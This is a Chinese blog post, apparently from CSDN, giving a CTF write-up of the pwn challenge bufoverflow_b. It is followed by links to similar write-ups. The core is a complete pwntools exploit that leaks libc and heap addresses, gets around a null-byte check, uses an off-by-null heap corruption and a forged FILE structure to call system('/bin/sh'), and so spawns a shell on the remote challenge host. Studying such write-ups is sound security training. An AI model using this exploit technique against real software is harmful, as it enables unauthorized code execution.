攻防世界 pwn 进阶 bufoverflow_b

最新推荐文章于 2023-07-29 00:14:43 发布
最新推荐文章于 2023-07-29 00:14:43 发布
阅读量233 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/114715814
版权

跟bufoverflow_b差不多,就是多了个检查。

所以先看看bufoverflow_a
在这里插入图片描述
说跟bufoverflow_a差不多是为啥,因为它就是在输入的时候检查多了一项。

这个是bufoverflow_a
在这里插入图片描述

这个是bufoverflow_b
在这里插入图片描述
这个题会检查我们的输入是不是\x00,意思是会被\x00截断,那么我们在输入数据的时候就会麻烦一些。

那我们怎么去解决这个烦恼,我们这里利用大佬的方法。
在我们向内存中写地址的时候内存中一定会有一些垃圾数据,我们写数据的时候,假如我们要写入一个地址,在内存中小端序,是43210000,那么我们倒着写,先写44444440,然后4444440,然然后444440,44440,4441,4421,4321.

然后剩下的就跟之前的bufoverflow_a一样了。

最后的时候就是这种效果。
在这里插入图片描述

exp

#coding:utf8
from pwn import *
 
#r = process('./bufoverflow_b')
r = remote('111.200.241.244',51645)
#context.log_level = "debug"

libc = ELF('./libc.so.6')
_IO_list_all = libc.symbols['_IO_list_all']
malloc_hook =  libc.symbols['__malloc_hook']
system_addr = libc.sym['system']
bin_sh = libc.search('/bin/sh').next()
 
def create(size):
   r.sendlineafter('>>','1')
   r.sendlineafter('Size:',str(size))
 
def delete(index):
   r.sendlineafter('>>','2')
   r.sendlineafter('Index:',str(index))
 
def fill(content):
   r.sendlineafter('>>','3')
   r.sendafter('Content:',content)
 
def show():
   r.sendlineafter('>>','4')
   
def clean(offset):
   for i in range(7,-1,-1):
      fill('b'*(offset + i) + '\x00')
 
def get_IO_str_jumps():
   IO_file_jumps_offset = libc.sym['_IO_file_jumps']
   IO_str_underflow_offset = libc.sym['_IO_str_underflow']
   for ref_offset in libc.search(p64(IO_str_underflow_offset)):
       possible_IO_str_jumps_offset = ref_offset - 0x20
       if possible_IO_str_jumps_offset > IO_file_jumps_offset:
          print possible_IO_str_jumps_offset
          return possible_IO_str_jumps_offset

create(0x80) #0
create(0x80) #1

delete(0)
delete(1)

create(0x80)
show()
r.recv(1)

main_arena_xx = u64(r.recvuntil('\n',drop = True).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) +  (malloc_hook & 0XFFF)
libc_base = malloc_hook_addr - malloc_hook
_IO_list_all = libc_base + _IO_list_all
_IO_str_jumps = libc_base + get_IO_str_jumps()
system_addr = libc_base + system_addr
bin_sh = libc_base + bin_sh
print 'libc_base=',hex(libc_base)
print '_IO_list_all_addr=',hex(_IO_list_all)
print 'system_addr=',hex(system_addr)

create(0x400) 
create(0x80) 
delete(1)

create(0x500) #1
delete(1)
delete(2)
delete(0)

create(0x90) #0
create(0x80) #1
show()
r.recv(1)
heap_base = u64(r.recvuntil('\n',drop = True).ljust(8,'\x00')) - 0xB0
print 'heap_base=',hex(heap_base)

delete(0)
delete(1)

#下面开始就跟bufoverflow_a有点不一样了.

create(0x208)
clean(0x200)
fake_chunk = 'a'*0x200 + '\xE0\x01\x00'
fill(fake_chunk)
clean(0x38)
fake_chunk = 'a'*0x38 + p64(heap_base + 0x50)[0:7]
fill(fake_chunk)
clean(0x30)
fake_chunk = 'a'*0x30 + p64(heap_base + 0x50)[0:7]
fill(fake_chunk)
clean(0x28)
fake_chunk = 'a'*0x28 + '\xE0\x01\x00'
fill(fake_chunk)
#上面这个是为了off by null写大小才来搞得.

create(0x80)
create(0xF0)
fill('b'*0xF0)
 
delete(1)

create(0x88)
fill('b'*0x88) #off by one
clean(0x80)
fill('b'*0x80 + '\x70\x02\x00')
delete(2)
create(0x290)
clean(0x268)
fill('a'*0x268 + '\x01\x01\x00')
clean(0x1D8)
fill('a'*0x1D8 + '\x91\x00')
#这里是第二次需要那样子写数据的地方.

delete(1)
delete(0)
 
create(0x290) #0
clean(0xB8)
fill('a'*0xB8 + '\x51\x01\x00')
clean(0x28)
fill('a'*0x28 + '\x91\x00')
delete(0) #得到外层unsorted bin
delete(2) #得到内层unsorted bin
create(0x290)
#这里是第三次.

#下面这个因为伪造file啥的,需要写的东西比较多.
payload = 'a'*0x20
start = 0x20
clean(start + 0xE8)
fill(payload + 'a'*0xE8 + p64(system_addr)[0:7])
clean(start + 0xE0)
clean(start + 0xD8)
fill(payload + 'a'*0xD8 + p64(_IO_str_jumps - 8)[0:7])
for i in range(0xD0,0x38,-8):
   print hex(i)
   clean(start + i)
clean(start + 0x38)
fill(payload + 'a'*0x38 + p64(bin_sh)[0:7])
clean(start + 0x30)
clean(start + 0x28)
fill(payload + 'a'*0x28 + '\x01\x00')
clean(start + 0x20)
clean(start + 0x18)
fill(payload + 'a'*0x18 + p64(_IO_list_all-0x10)[0:7])
clean(start + 0x10)
clean(start + 0x8)
fill(payload + 'a'*0x8 + p64(0x60)[0:2])
clean(start + 0)

#gdb.attach(r)

create(0x80)
 
r.interactive()

在这里插入图片描述
老规矩还是要多试几次的。

参考的试大佬的博客。
大佬

yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2007
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
攻防世界bufoverflow_b
weixin_43960998的博客
04-09 153
其他部分与 bufoverflow_a一样,但是 b 中多了一个检查: 这里不能输入空字节,这样的话就不能像 a 中直接布置,这样会破坏掉前面的字段,需要倒着布置。还有一个需要注意的就是,在触发 off by null 时 a 中可以一次性的布置好 pre_size 和 pre_inuse 位,但是在本题中则需要先覆盖 next chunk 的 pre_inuse 位,然后再清理填充的字节,布置 pre_size 位,再触发: # pad = '1'*0x80 + p64(0x270) add(0x88)
攻防世界PWNbufoverflow_b题解
seaaseesa的博客
02-19 759
bufoverflow_b 这题和bufferoverflow_a类似,只是在输入的时候,增加了一个检查 遇到空字符就会截断,这将不利于我们在chunk里伪造数据。 另外增加了一个功能,不过我没有使用到。 遇到’\x00’就会截断,但是我们仍然可以完整的把我们的伪造数据放进去。 比如,我们要在偏移0x30处写一个数据0x0000000000123456,我们先把0x30处的8字节...
攻防世界pwn int_overflow writeup
PLpa的博客
07-07 1840
这是一道整数溢出题 我们知道,整数溢出本身不一定会对程序造成很大的伤害,但是他会造成其他形式的溢出,从而也十分的危险。 拿到题目,我们首先查看一下源代码的保护情况: 从上图可以看出,这是一个32位的程序,并且只开了堆栈不可执行的保护。 我们使用IDA查看一下源码: 我们进入这个check_passwd函数: 当v3>3u且v3<8u时,我们可以进入下面的else中。 else中把...
pwn int_overflow
weixin_45677731的博客
03-15 177
32位程序,拖进ida看一下 首先,我们要输入1进入login() 输入username后再输入passwd,注意这里passwd允许我们输入的长度为0x199 再点进check_passwd 这里用v3来保存我们输入的passwd的长度,但是,这个v3是unsigned int8型的,8个字节,只能存储不超过256的数,如果超过会重新从1开始计算,这样的话,对于1个字符和257个字符,v3...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出这是一个关于 "AVR系列单片机Mage8PWM脉冲输出程序" 的资源。这意味着主要关注的是 AVR 系列...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
BugkuCTF pwn overflow
ChaoYue_miku的博客
07-02 1646
** 0、在Linux中打开文件,使用file命令查看文件类型,使用checksec检查保护情况 ** 64位文件,未开启任何保护,尝试运行一下 ** 1、使用IDA 64 Pro打开文件 ** 查看主函数 存在栈溢出漏洞 ** 2、寻找后门函数 ** 存在一个get_shell函数,地址为0x400751 ** 3、构造exp ** from pwn import * #io = process('./pwn2') io = remote("114.67.246.176", 15587)
pwn学习笔记4】攻防世界pwn进阶(pwn100和pwn200)
weixin_45927195的博客
05-22 359
64位和32位传参pwn100pwn200 pwn100 先查看防御机制。64位程序。开启了NX保护,即堆栈不可执行,直接往栈上注入代码难以发挥效果。 同时开启了Partial RELRO,意味着got表可写。 用ida查看伪代码。发现存在明显的栈溢出漏洞: 但是找不到system函数和binsh字符串,想到用ROP的方法。 这道题跟wiki上的 ret2csu 应该是同一种类型。 确定大概的思路是: 1.泄露出sys的地址,同时利用栈溢出修改返回地址,让程序跳回到开始点,准备下一次输入输出。 2.找一段
CG-CTF Stack Overflowpwn
苗_的博客
02-24 693
首先先拿到ida里面看一下,找一下溢出点 点进去A发现是一个大小为40的数组(0x28),但是可以接受64个字符,所以这里是第一个溢出点。 下面是对s进行输入,限制是n,点开n会发现n就在A的下面。 所以思路就是:我们可以通过溢出A来达到覆盖n的效果 然后我们点开pwnme函数会发现system函数,搜索字符串发现没有‘/bin/sh’,所以需要我们自己写入bss段。 exp: f...
NJUPT-CGCTF pwn2 StackOverflow [Writeup]
cossack9989的博客
12-30 2077
最近肥肠地想入门一下pwn,找了道题试了一下。 题目网址:StackOverflow 栈溢出啊。。虽然我水平很菜。。还是觉得挺有意思的 不扯了,先看题。 扔到32位IDA里面看看,观察一下,发现有两个很关键的函数message与pwnme,很显然message可以用来栈溢出,pwnme可以用来调用system函数,但是Alt+T之后并没有发现‘/bin/sh’,也没有提供libc.so,这
Pwn-Overflow Free Chunk(堆溢出)
CharlesGodX的博客
03-22 1155
0x00:前言 这次介绍一种和栈溢出类似名字的堆溢出攻击,首先借用应用CTF-Wiki上的例子理解一下堆溢出。 0x01:漏洞介绍 堆溢出是指程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个堆块,我们用两...
攻防世界bufoverflow_a
weixin_43960998的博客
04-09 259
1.程序逆向 简单的逆向,记一下几个地方:当chunk数大于2时,便使用 calloc 分配并且 free 后会进行填充: 关于 mallopt 见这里。 漏洞出现在 fill 功能中,存在 off by null。 show 输出遇 0 截断。 2.漏洞利用&限制条件 off by null chunk size 无限制 可以泄漏地址 chunk 只有两个 show 遇 ‘\x00’ 截断 可以无限次 edit     由于能够正常 malloc
攻防世界PWNbufoverflow_a题解(house of orange in 2.24&house of Einherjar)
seaaseesa的博客
02-19 950
bufoverflow_a 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,是一个经典的增删改查的程序,然后我们看到创建堆时,前两个堆是用malloc创建,后面的堆用calloc创建,这意味着,如果要泄露libc地址,只能靠前两个堆,后面的堆从bin里取出后会清空里面的信息。 Fill功能存在一个null off by one漏洞 我们每次只能对最后创建的那个堆进...
BugkuCTF-PWNpwn5-overflow2超详细讲解
am_03的博客
08-31 1276
知识点 setvbuf: setvbuf函数的功能: 如果你的内存足够大,可以把文件IO的BUF设置大一些,这样每次你用 fopen/fread/fwrite/fscanf/fprintf语句的时候,都会在内存里操作,减少内存到磁盘IO读写的操作次数,提高系统效率。 如果你的程序的功能涉及到类似数据库、视频、音频、图像处理等大量需要爆发式磁盘到内存的IO情况下,可以考虑setvbuf进行优化内存IO。 功 能: 把缓区与流相关 解题流程 查看保护机制 发现开启了RELRO,NX 只能通过ROP绕过 IDA
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1444
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值